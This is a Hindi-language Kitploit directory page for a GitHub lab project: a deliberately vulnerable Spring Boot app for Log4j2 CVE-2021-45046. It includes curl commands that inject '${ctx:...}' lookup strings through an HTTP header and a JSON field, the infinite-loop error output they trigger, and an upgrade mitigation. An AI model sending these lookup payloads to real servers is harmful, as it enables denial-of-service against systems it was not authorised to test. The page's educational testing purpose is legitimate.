Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j2-CVE-2021-45046 — लॉग4जे2 CVE-2021-45046 के लिए संवेदनशील नमूना स्प्रिंग बूट वेब एप्लिकेशन, शैक्षिक सुरक्षा परीक्षण के लिए JNDI इंजेक्शन और अनंत लूप शोषण का प्रदर्शन। | Kitploit
उपकरण/GitHubGitHub/pravin-pp/log4j2-cve-2021-45046
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubpravin-pp/log4j2-cve-2021-45046

log4j2-CVE-2021-45046

लॉग4जे2 CVE-2021-45046 के लिए संवेदनशील नमूना स्प्रिंग बूट वेब एप्लिकेशन, शैक्षिक सुरक्षा परीक्षण के लिए JNDI इंजेक्शन और अनंत लूप शोषण का प्रदर्शन।

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

नमूना Log4j2 कमजोर अनुप्रयोग (CVE-2021-45046)

प्रभावित संस्करण: 2.0-beta9 से 2.15.0 तक के सभी संस्करण

यह एप्लिकेशन स्प्रिंग बूट वेब एप्लिकेशन पर आधारित है जो CVE-2021-45046 के लिए कमजोर है।

यह Log4j 2.14.1 (spring-boot-starter-log4j2 2.6.1 के माध्यम से) का उपयोग करता है।

एप्लिकेशन चलाना

इसे चलाएँ:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

शोषण के चरण

  • फिर, इस कमांड का उपयोग करके शोषण को ट्रिगर करें:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${ctx:apiVersion}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${ctx:clientRef}"
}'
  • आउटपुट में इनफ़िनिट लूप दिखाई देता है, हालांकि परीक्षण में पता नहीं चला कि यह DOS संसाधन की खपत करने वाला है क्योंकि इस इनफ़िनिट लूप की पहचान प्रोग्राम द्वारा की गई और यह एरर आउट करता है:
root@kitploit:~

${ctx:clientRef}2021-12-15 19:27:50,212 http-nio-8080-exec-1 ERROR An exception occurred processing Appender LogToConsole java.lang.IllegalStateException: Infinite loop in property interpolation of  ${ctx:clientRef}: ctx:clientRef
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	

शमन:

  • Log4j 2.16.0 इस समस्या को मैसेज लुकअप पैटर्न के समर्थन को हटाकर और JNDI कार्यक्षमता को डिफ़ॉल्ट रूप से अक्षम करके ठीक करता है।
टूल डाउनलोड करें